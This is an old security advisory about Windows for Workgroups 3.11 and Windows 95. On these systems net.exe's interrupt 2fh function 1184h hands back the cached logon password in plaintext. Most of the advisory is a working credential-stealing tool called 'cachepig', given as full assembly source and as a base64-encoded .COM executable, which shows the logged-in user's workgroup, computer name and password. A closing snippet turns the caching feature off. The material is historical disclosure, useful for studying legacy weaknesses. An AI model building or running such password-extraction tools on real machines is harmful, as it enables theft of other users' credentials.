COMMAND
net.exe
SYSTEMS AFFECTED
WfW 3.x, Win9x
PROBLEM
'bt398' found following. With net.exe, a user can set up the
network drivers (Windows For Workgroup protocol); moreover, a user
can log in (open a wfw session) and also change his password. As
this program runs on DOS, question is how next.exe retrieving the
password of the user; as no DLL calls to undocumented functions
are possible, only a call to a special interrupt/function should
be used.
When a user changes its password, net.exe accesses to the old
password using the multiplex interrupt 2fh (or so-called software
interrupt) with function 11h (sub function 84h). 'bt398' suppose
that function 11XX, int 2fh is installed by the windows kernel so
that it can exchange data (WFW infos) with a DOS program. Well,
so you would say that this function requires as input the password
and returns an error if the password is bad.. but, no.. Microsoft
did it the other way. The function returns the uncrypted password
to a buffer (... no comment). Indeed, this is not _big_ deal but
if a user has access to your computer after you logged then he can
easily retrieve your password.. A lot of people uses the same
password for their mail and their windows password (so it is
somewhat a security problem). Below is a small program that
prompts the password of the user (you must have logged in first);
this only work on Windows for Workgroup 3.11 and Windows 95.
You'll find source and exe (mimed):
; Netscape got the cached cow.. so Microsoft got the cached pig.
;
; caching password in memory is not a good thing to do (security talking):
;
; mov ax, 1184h ; 3 +
; mov bl, 0eh ; 2 +
; mov cx, 0fh ; 3 +
; mov di, ans_password ; 3 +
; int 2fh ; 2 = 13 bytes
;
; compile : nasm -f bin -o cachepig.com cachepig.asm
bits 16 ; 640 Kb addressing mode
org 0x100 ; good old .COM file
DOS EQU 21h
MPLX EQU 2fh ; multiplex int
section .text
mov dx, banner
Call Display
mov bl, 05h
mov di, ans_workgroup
Call Get_Infos
mov di, str_workgroup
mov dx, di
Call Make_Str
Call Display
mov bl, 03h
mov di, ans_login
Call Get_Infos
mov di, str_login
mov dx, di
Call Make_Str
Call Display
mov bl, 0eh
mov di, ans_password
Call Get_Infos
mov di, str_password
mov dx, di
Call Make_Str
Call Display
mov ax,4C00h
int DOS
Display:
mov ah, 09h
int DOS
ret
Make_Str:
cld
mov cx, 12+64-4
xor al, al
repne scasb
mov dword [es:di-1], 00240a0dh
ret
Get_Infos:
mov ax, 1184h
mov cx, 0fh ; Only needed for bl=0eh
int MPLX ; it's max length of password
ret
section .data
banner db 'cachepig - ga <duncan@mygale.org>', 0dh, 0ah, 0dh, 0ah, 24h
str_workgroup db 'workgroup : '
ans_workgroup times 64 db 0h
str_login db 'login : '
ans_login times 64 db 0h
str_password db 'password : '
ans_password times 64 db 0h
And the executable:
---
Content-Type: application/octet-stream; name="cachepig.com"
Content-Transfer-Encoding: base64
Content-Disposition: inline; filename="cachepig.com"
Content-MD5: Td3SC1M0FnjOqWAcoi+GJQ==
umQB6D4AswW/lgHoTQC/igGJ+ugzAOgrALMDv+IB6DoAv9YBifroIADoGACzDr8uAugnAL8i
Aon66A0A6AUAuABMzSG0Cc0hw/y5SAAwwPKuJmbHRf8NCiQAw7iEEbkPAM0vw2NhY2hlcGln
IC0gZ2EgPGR1bmNhbkBteWdhbGUub3JnPg0KDQokd29ya2dyb3VwIDogAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGxv
Z2luICAgICA6IAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAABwYXNzd29yZCAgOiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
-----
Btw, "login" returned by cachepig is not the login name _but_ the
computer's name. Anyway, "login" name can be easily retrieved.
SOLUTION
Windows NT are not affected. Following code seems to disable the
password caching feature:
mov ax, 1184h
mov bx, 0dh
xor cx, cx
int 2fh